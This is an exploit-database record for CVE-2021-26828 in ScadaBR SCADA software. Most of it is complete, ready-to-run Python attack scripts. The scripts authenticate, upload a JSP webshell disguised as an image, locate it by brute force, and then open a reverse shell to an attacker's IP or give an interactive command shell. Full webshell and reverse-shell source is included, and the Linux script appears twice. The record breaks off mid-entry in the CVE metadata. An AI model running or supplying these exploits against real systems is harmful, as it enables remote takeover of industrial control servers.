ScadaBR 1.0 / 1.1CE Linux Shell Upload Exploit

2021-05-13T00:00:00

Description

{"id": "1337DAY-ID-36244", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "ScadaBR 1.0 / 1.1CE Linux Shell Upload Exploit", "description": "", "published": "2021-05-13T00:00:00", "modified": "2021-05-13T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/36244", "reporter": "Fellipe Oliveira", "references": [], "cvelist": ["CVE-2021-26828"], "immutableFields": [], "lastseen": "2021-12-21T23:23:23", "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-26828"]}, {"type": "githubexploit", "idList": ["38CCE778-1130-5687-994B-CC2BC636EC6E"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162564", "PACKETSTORM:162566"]}, {"type": "zdt", "idList": ["1337DAY-ID-36243"]}], "rev": 4}, "score": {"value": 4.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-26828"]}, {"type": "githubexploit", "idList": ["38CCE778-1130-5687-994B-CC2BC636EC6E"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162564", "PACKETSTORM:162566"]}, {"type": "zdt", "idList": ["1337DAY-ID-36243"]}]}, "exploitation": null, "vulnersScore": 4.2}, "sourceHref": "https://0day.today/exploit/36244", "sourceData": "#!/usr/bin/python\n\n# Exploit Title: Authenticated Arbitrary File Upload (Remote Code Execution)\n# Exploit Author: Fellipe Oliveira\n# Vendor Homepage: https://www.scadabr.com.br/ \n# Software Link: \n# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux\n# Tested on: Debian9,10~Ubuntu16.04\n# CVE : CVE-2021-26828\n\nimport requests,sys,time\n\n\nif len(sys.argv) <=6:\n print('[x] Missing arguments ... ')\n print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>')\n print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444')\n sys.exit(0)\nelse: \n time.sleep(1)\n\nhost = sys.argv[1]\nport = sys.argv[2]\nuser = sys.argv[3]\npassw = sys.argv[4]\nrev_host = sys.argv[5]\nrev_port = sys.argv[6]\n\nflag = False\nLOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'\nPROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'\n\n\nbanner = '''\n+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+\n| _________ .___ ____________________ |\n| / _____/ ____ _____ __| _/____ \\______ \\______ \\ |\n| \\_____ \\_/ ___\\\\__ \\ / __ |\\__ \\ | | _/| _/ |\n| / \\ \\___ / __ \\_/ /_/ | / __ \\| | \\| | \\ |\n| /_______ /\\___ >____ /\\____ |(____ /______ /|____|_ / |\n| \\/ \\/ \\/ \\/ \\/ \\/ \\/ |\n| |\n| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload (CVE-2021-26828) |\n| > Exploit Author : Fellipe Oliveira |\n| > Exploit for Linux Systems |\n+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+\n'''\n\ndef main():\n payload = {\n 'username': user,\n 'password': passw\n }\n\n print(banner)\n time.sleep(2)\n \n with requests.session() as s:\n s.post(LOGIN, data=payload)\n response = s.get(PROTECTED_PAGE)\n\n print \"[+] Trying to authenticate \"+LOGIN+\"...\"\n if response.status_code == 200:\n print \"[+] Successfully authenticated! :D~\\n\"\n time.sleep(2)\n else:\n print \"[x] Authentication failed :(\"\n sys.exit(0)\n\n\n burp0_url = \"http://\"+host+\":\"+port+\"/ScadaBR/view_edit.shtm\"\n burp0_cookies = {\"JSESSIONID\": \"8DF449C72D2F70704B8D997971B4A06B\"}\n burp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------32124376735876620811763441977\", \"Origin\": \"http://\"+host+\":\"+port+\"/\", \"Connection\": \"close\", \"Referer\": \"http://\"+host+\":\"+port+\"/ScadaBR/view_edit.shtm\", \"Upgrade-Insecure-Requests\": \"1\"}\n burp0_data = \"-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"view.name\\\"\\r\\n\\r\\n\\r\\n-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"view.xid\\\"\\r\\n\\r\\nGV_369755\\r\\n-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"backgroundImageMP\\\"; filename=\\\"webshell.jsp\\\"\\r\\nContent-Type: image/png\\r\\n\\r\\n <%@page import=\\\"java.lang.*\\\"%>\\n<%@page import=\\\"java.util.*\\\"%>\\n<%@page import=\\\"java.io.*\\\"%>\\n<%@page import=\\\"java.net.*\\\"%>\\n\\n<%\\nclass StreamConnector extends Thread {\\n InputStream is;\\n OutputStream os;\\n StreamConnector(InputStream is, OutputStream os) {\\n this.is = is;\\n this.os = os;\\n }\\n public void run() {\\n BufferedReader isr = null;\\n BufferedWriter osw = null;\\n try {\\n isr = new BufferedReader(new InputStreamReader(is));\\n osw = new BufferedWriter(new OutputStreamWriter(os));\\n char buffer[] = new char[8192];\\n int lenRead;\\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\\n osw.write(buffer, 0, lenRead);\\n osw.flush();\\n }\\n } catch (Exception e) {\\n System.out.println(\\\"exception: \\\" + e.getMessage());\\n }\\n try {\\n if (isr != null)\\n isr.close();\\n if (osw != null)\\n osw.close();\\n } catch (Exception e) {\\n System.out.println(\\\"exception: \\\" + e.getMessage());\\n }\\n }\\n}\\n%>\\n\\n<h1>Payload JSP to Reverse Shell</h1>\\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\\n<form method=\\\"get\\\">\\n\\tIP Address<input type=\\\"text\\\" name=\\\"ipaddress\\\" size=30 value=\\\"127.0.0.1\\\"/>\\n\\tPort<input type=\\\"text\\\" name=\\\"port\\\" size=10 value=\\\"1234\\\"/>\\n\\t<input type=\\\"submit\\\" name=\\\"Connect\\\" value=\\\"Connect\\\"/>\\n</form>\\n\\n<%\\n String ipAddress = request.getParameter(\\\"ipaddress\\\");\\n String ipPort = request.getParameter(\\\"port\\\");\\n Socket sock = null;\\n Process proc = null;\\n if (ipAddress != null && ipPort != null) {\\n try {\\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\\n System.out.println(\\\"socket created: \\\" + sock.toString());\\n Runtime rt = Runtime.getRuntime();\\n proc = rt.exec(\\\"/bin/bash\\\");\\n System.out.println(\\\"process /bin/bash started: \\\" + proc.toString());\\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\\n System.out.println(\\\"outputConnector created: \\\" + outputConnector.toString());\\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\\n System.out.println(\\\"inputConnector created: \\\" + inputConnector.toString());\\n outputConnector.start();\\n inputConnector.start();\\n } catch (Exception e) {\\n System.out.println(\\\"exception: \\\" + e.getMessage());\\n }\\n }\\n if (sock != null && proc != null) {\\n out.println(\\\"<div class='separator'></div>\\\");\\n out.println(\\\"<p>Process /bin/bash, running as (\\\" + proc.toString() + \\\", is connected to socket \\\" + sock.toString() + \\\".</p>\\\");\\n }\\n%>\\n\\n\\r\\n-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"upload\\\"\\r\\n\\r\\nUpload image\\r\\n-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"view.anonymousAccess\\\"\\r\\n\\r\\n0\\r\\n-----------------------------32124376735876620811763441977--\\r\\n\"\n getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)\n\n\n print('[>] Attempting to upload .jsp Webshell...')\n time.sleep(1)\n print('[>] Verifying shell upload...\\n')\n time.sleep(2)\n \n if getdata.status_code == 200:\n print('[+] Upload Successfuly! \\n')\n \n for num in range(1,1000): \n PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)\n find = s.get(PATH)\n\n if find.status_code == 200: \n print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))\n print('[>] Spawning Reverse Shell...\\n')\n time.sleep(3) \n \n burp0_url = \"http://\"+host+\":\"+port+\"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect\" % (num,rev_host,rev_port)\n burp0_cookies = {\"JSESSIONID\": \"8DF449C72D2F70704B8D997971B4A06B\"}\n burp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"}\n r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)\n time.sleep(5)\n \n if len(r.text) > 401:\n print('[+] Connection received')\n sys.exit(0)\n else:\n print('[x] Failed to receive reverse connection ...\\n') \n\n elif num == 999:\n print('[x] Failed to found Webshell ... ')\n \n else:\n print('Reason:'+getdata.reason+' ') \n print('Exploit Failed x_x')\n\n\nif __name__ == '__main__':\n main()\n", "category": "remote exploits", "verified": true, "_state": {"dependencies": 1646167606}}

{"githubexploit": [{"lastseen": "2022-02-12T13:31:16", "description": "# POC CVE-2021-26828_ScadaBR_RemoteCodeExecution\n\n- ScadaBR 0.9....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-31T02:39:02", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Openplcproject Scadabr", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26828"], "modified": "2022-02-12T11:51:28", "id": "38CCE778-1130-5687-994B-CC2BC636EC6E", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}], "packetstorm": [{"lastseen": "2021-05-13T15:10:08", "description": "", "cvss3": {}, "published": "2021-05-13T00:00:00", "type": "packetstorm", "title": "ScadaBR 1.0 / 1.1CE Linux Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26828"], "modified": "2021-05-13T00:00:00", "id": "PACKETSTORM:162564", "href": "https://packetstormsecurity.com/files/162564/ScadaBR-1.0-1.1CE-Linux-Shell-Upload.html", "sourceData": "`#!/usr/bin/python \n \n# Exploit Title: Authenticated Arbitrary File Upload (Remote Code Execution) \n# Google Dork: N/A \n# Date: 04/21 \n# Exploit Author: Fellipe Oliveira \n# Vendor Homepage: https://www.scadabr.com.br/ \n# Software Link: \n# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux \n# Tested on: Debian9,10~Ubuntu16.04 \n# CVE : CVE-2021-26828 \n \nimport requests,sys,time \n \n \nif len(sys.argv) <=6: \nprint('[x] Missing arguments ... ') \nprint('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>') \nprint('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444') \nsys.exit(0) \nelse: \ntime.sleep(1) \n \nhost = sys.argv[1] \nport = sys.argv[2] \nuser = sys.argv[3] \npassw = sys.argv[4] \nrev_host = sys.argv[5] \nrev_port = sys.argv[6] \n \nflag = False \nLOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' \nPROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' \n \n \nbanner = ''' \n+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ \n| _________ .___ ____________________ | \n| / _____/ ____ _____ __| _/____ \\______ \\______ \\ | \n| \\_____ \\_/ ___\\\\__ \\ / __ |\\__ \\ | | _/| _/ | \n| / \\ \\___ / __ \\_/ /_/ | / __ \\| | \\| | \\ | \n| /_______ /\\___ >____ /\\____ |(____ /______ /|____|_ / | \n| \\/ \\/ \\/ \\/ \\/ \\/ \\/ | \n| | \n| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload (CVE-2021-26828) | \n| > Exploit Author : Fellipe Oliveira | \n| > Exploit for Linux Systems | \n+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ \n''' \n \ndef main(): \npayload = { \n'username': user, \n'password': passw \n} \n \nprint(banner) \ntime.sleep(2) \n \nwith requests.session() as s: \ns.post(LOGIN, data=payload) \nresponse = s.get(PROTECTED_PAGE) \n \nprint \"[+] Trying to authenticate \"+LOGIN+\"...\" \nif response.status_code == 200: \nprint \"[+] Successfully authenticated! :D~\\n\" \ntime.sleep(2) \nelse: \nprint \"[x] Authentication failed :(\" \nsys.exit(0) \n \n \nburp0_url = \"http://\"+host+\":\"+port+\"/ScadaBR/view_edit.shtm\" \nburp0_cookies = {\"JSESSIONID\": \"8DF449C72D2F70704B8D997971B4A06B\"} \nburp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------32124376735876620811763441977\", \"Origin\": \"http://\"+host+\":\"+port+\"/\", \"Connection\": \"close\", \"Referer\": \"http://\"+host+\":\"+port+\"/ScadaBR/view_edit.shtm\", \"Upgrade-Insecure-Requests\": \"1\"} \nburp0_data = \"-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"view.name\\\"\\r\\n\\r\\n\\r\\n-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"view.xid\\\"\\r\\n\\r\\nGV_369755\\r\\n-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"backgroundImageMP\\\"; filename=\\\"webshell.jsp\\\"\\r\\nContent-Type: image/png\\r\\n\\r\\n <%@page import=\\\"java.lang.*\\\"%>\\n<%@page import=\\\"java.util.*\\\"%>\\n<%@page import=\\\"java.io.*\\\"%>\\n<%@page import=\\\"java.net.*\\\"%>\\n\\n<%\\nclass StreamConnector extends Thread {\\n InputStream is;\\n OutputStream os;\\n StreamConnector(InputStream is, OutputStream os) {\\n this.is = is;\\n this.os = os;\\n }\\n public void run() {\\n BufferedReader isr = null;\\n BufferedWriter osw = null;\\n try {\\n isr = new BufferedReader(new InputStreamReader(is));\\n osw = new BufferedWriter(new OutputStreamWriter(os));\\n char buffer[] = new char[8192];\\n int lenRead;\\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\\n osw.write(buffer, 0, lenRead);\\n osw.flush();\\n }\\n } catch (Exception e) {\\n System.out.println(\\\"exception: \\\" + e.getMessage());\\n }\\n try {\\n if (isr != null)\\n isr.close();\\n if (osw != null)\\n osw.close();\\n } catch (Exception e) {\\n System.out.println(\\\"exception: \\\" + e.getMessage());\\n }\\n }\\n}\\n%>\\n\\n<h1>Payload JSP to Reverse Shell</h1>\\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\\n<form method=\\\"get\\\">\\n\\tIP Address<input type=\\\"text\\\" name=\\\"ipaddress\\\" size=30 value=\\\"127.0.0.1\\\"/>\\n\\tPort<input type=\\\"text\\\" name=\\\"port\\\" size=10 value=\\\"1234\\\"/>\\n\\t<input type=\\\"submit\\\" name=\\\"Connect\\\" value=\\\"Connect\\\"/>\\n</form>\\n\\n<%\\n String ipAddress = request.getParameter(\\\"ipaddress\\\");\\n String ipPort = request.getParameter(\\\"port\\\");\\n Socket sock = null;\\n Process proc = null;\\n if (ipAddress != null && ipPort != null) {\\n try {\\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\\n System.out.println(\\\"socket created: \\\" + sock.toString());\\n Runtime rt = Runtime.getRuntime();\\n proc = rt.exec(\\\"/bin/bash\\\");\\n System.out.println(\\\"process /bin/bash started: \\\" + proc.toString());\\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\\n System.out.println(\\\"outputConnector created: \\\" + outputConnector.toString());\\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\\n System.out.println(\\\"inputConnector created: \\\" + inputConnector.toString());\\n outputConnector.start();\\n inputConnector.start();\\n } catch (Exception e) {\\n System.out.println(\\\"exception: \\\" + e.getMessage());\\n }\\n }\\n if (sock != null && proc != null) {\\n out.println(\\\"<div class='separator'></div>\\\");\\n out.println(\\\"<p>Process /bin/bash, running as (\\\" + proc.toString() + \\\", is connected to socket \\\" + sock.toString() + \\\".</p>\\\");\\n }\\n%>\\n\\n\\r\\n-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"upload\\\"\\r\\n\\r\\nUpload image\\r\\n-----------------------------32124376735876620811763441977\\r\\nContent-Disposition: form-data; name=\\\"view.anonymousAccess\\\"\\r\\n\\r\\n0\\r\\n-----------------------------32124376735876620811763441977--\\r\\n\" \ngetdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) \n \n \nprint('[>] Attempting to upload .jsp Webshell...') \ntime.sleep(1) \nprint('[>] Verifying shell upload...\\n') \ntime.sleep(2) \n \nif getdata.status_code == 200: \nprint('[+] Upload Successfuly! \\n') \n \nfor num in range(1,1000): \nPATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) \nfind = s.get(PATH) \n \nif find.status_code == 200: \nprint('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) \nprint('[>] Spawning Reverse Shell...\\n') \ntime.sleep(3) \n \nburp0_url = \"http://\"+host+\":\"+port+\"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect\" % (num,rev_host,rev_port) \nburp0_cookies = {\"JSESSIONID\": \"8DF449C72D2F70704B8D997971B4A06B\"} \nburp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"} \nr = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) \ntime.sleep(5) \n \nif len(r.text) > 401: \nprint('[+] Connection received') \nsys.exit(0) \nelse: \nprint('[x] Failed to receive reverse connection ...\\n') \n \nelif num == 999: \nprint('[x] Failed to found Webshell ... ') \n \nelse: \nprint('Reason:'+getdata.reason+' ') \nprint('Exploit Failed x_x') \n \n \nif __name__ == '__main__': \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162564/LinScada_RCE.py.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-05-13T15:10:29", "description": "", "cvss3": {}, "published": "2021-05-13T00:00:00", "type": "packetstorm", "title": "ScadaBR 1.0 / 1.1CE Windows Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26828"], "modified": "2021-05-13T00:00:00", "id": "PACKETSTORM:162566", "href": "https://packetstormsecurity.com/files/162566/ScadaBR-1.0-1.1CE-Windows-Shell-Upload.html", "sourceData": "`#!/usr/bin/python \n \n# Exploit Title: Authenticated Arbitrary File Upload (Remote Code Execution) \n# Google Dork: N/A \n# Date: 03/2021 \n# Exploit Author: Fellipe Oliveira \n# Vendor Homepage: https://www.scadabr.com.br/ \n# Software Link: https://www.scadabr.com.br/ \n# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux \n# Tested on: Windows7, Windows10 \n# CVE : CVE-2021-26828 \n \nimport requests,sys,time \n \n \nif len(sys.argv) <=4: \nprint('[x] Missing arguments ... ') \nprint('[>] Usage: python WinScada_RCE.py <TargetIp> <TargetPort> <User> <Password>') \nprint('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin') \nsys.exit(0) \nelse: \ntime.sleep(1) \n \n \nhost = sys.argv[1] \nport = sys.argv[2] \nuser = sys.argv[3] \npassw = sys.argv[4] \n \nflag = False \nLOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' \nPROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' \n \n \nbanner = ''' \n+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ \n| _________ .___ ____________________ | \n| / _____/ ____ _____ __| _/____ \\______ \\______ \\ | \n| \\_____ \\_/ ___\\\\__ \\ / __ |\\__ \\ | | _/| _/ | \n| / \\ \\___ / __ \\_/ /_/ | / __ \\| | \\| | \\ | \n| /_______ /\\___ >____ /\\____ |(____ /______ /|____|_ / | \n| \\/ \\/ \\/ \\/ \\/ \\/ \\/ | \n| | \n| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload (CVE-2021-26828) | \n| > Exploit Author : Fellipe Oliveira | \n| > Exploit for Windows Systems | \n+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ \n''' \n \ndef main(): \npayload = { \n'username': user, \n'password': passw \n} \n \nprint(banner) \ntime.sleep(2) \n \nwith requests.session() as s: \ns.post(LOGIN, data=payload) \nresponse = s.get(PROTECTED_PAGE) \n \nprint(\"[+] Trying to authenticate \"+LOGIN+\"...\") \nif response.status_code == 200: \nprint(\"[+] Successfully authenticated! :D~\\n\") \ntime.sleep(2) \nelse: \nprint(\"[x] Authentication failed :(\") \nsys.exit(0) \n \nburp0_url = \"http://\"+host+\":\"+port+\"/ScadaBR/view_edit.shtm\" \nburp0_cookies = {\"JSESSIONID\": \"66E47DFC053393AFF6C2D5A7C15A9439\"} \nburp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------6150838712847095098536245849\", \"Origin\": \"http://\"+host+\":\"+port+\"/\", \"Connection\": \"close\", \"Referer\": \"http://\"+host+\":\"+port+\"/ScadaBR/view_edit.shtm\", \"Upgrade-Insecure-Requests\": \"1\"} \nburp0_data = \"-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"view.name\\\"\\r\\n\\r\\n\\r\\n-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"view.xid\\\"\\r\\n\\r\\nGV_218627\\r\\n-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"backgroundImageMP\\\"; filename=\\\"win_cmd.jsp\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n<%@ page import=\\\"java.util.*,java.io.*\\\"%>\\n<%\\n%>\\n<HTML><BODY>\\nCommands with JSP\\n<FORM METHOD=\\\"GET\\\" NAME=\\\"myform\\\" ACTION=\\\"\\\">\\n<INPUT TYPE=\\\"text\\\" NAME=\\\"cmd\\\">\\n<INPUT TYPE=\\\"submit\\\" VALUE=\\\"Send\\\">\\n</FORM>\\n<pre>\\n<%\\nif (request.getParameter(\\\"cmd\\\") != null) {\\n out.println(\\\"Command: \\\" + request.getParameter(\\\"cmd\\\") + \\\"<BR>\\\");\\n Process p;\\n if ( System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n p = Runtime.getRuntime().exec(\\\"cmd.exe /C \\\" + request.getParameter(\\\"cmd\\\"));\\n }\\n else{\\n p = Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\"));\\n }\\n OutputStream os = p.getOutputStream();\\n InputStream in = p.getInputStream();\\n DataInputStream dis = new DataInputStream(in);\\n String disr = dis.readLine();\\n while ( disr != null ) {\\n out.println(disr);\\n disr = dis.readLine();\\n }\\n}\\n%>\\n</pre>\\n</BODY></HTML>\\n\\r\\n-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"upload\\\"\\r\\n\\r\\nUpload image\\r\\n-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"view.anonymousAccess\\\"\\r\\n\\r\\n0\\r\\n-----------------------------6150838712847095098536245849--\\r\\n\" \ngetdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) \n \nprint('[>] Attempting to upload .jsp Webshell...') \ntime.sleep(1) \nprint('[>] Verifying shell upload...\\n') \ntime.sleep(2) \n \nif getdata.status_code == 200: \nprint('[+] Upload Successfuly!') \n \nfor num in range(1,500): \nPATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) \nfind = s.get(PATH) \n \nif find.status_code == 200: \nprint('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) \nflag = True \nprint('[>] Spawning fake shell...') \ntime.sleep(3) \n \nwhile flag: \nparam = raw_input(\"# \") \nburp0_url = \"http://\"+host+\":\"+port+\"/ScadaBR/uploads/%d.jsp?cmd=%s\" % (num,param) \nburp0_cookies = {\"JSESSIONID\": \"4FCC12402B8389A64905F4C8272A64B5\"} \nburp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+host+\":\"+port+\"/ScadaBR/uploads/%d.jsp?cmd=%s\", \"Upgrade-Insecure-Requests\": \"1\"} \nsend = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) \nclean = send.text.replace('<pre>', '').replace('<FORM METHOD=', '').replace('<HTML><BODY>', '').replace('\"GET\" NAME=\"myform\" ACTION=\"\">', '').replace('Commands with JSP', '').replace('<INPUT TYPE=\"text\" NAME=\"cmd\">', '').replace('<INPUT TYPE=\"submit\" VALUE=\"Send\">', '').replace('</FORM>', '').replace('<BR>', '').replace('</pre>', '').replace('</BODY></HTML>', '') \nprint(clean) \n \nelif num == 499: \nprint('[x] Webshell not Found') \n \nelse: \nprint('Reason:'+getdata.reason+' ') \nprint('Exploit Failed x_x') \n \n \nif __name__ == '__main__': \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162566/WinScada_RCE.py.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T15:48:26", "description": "OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows allows remote authenticated users to upload and execute arbitrary JSP files via view_edit.shtm.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 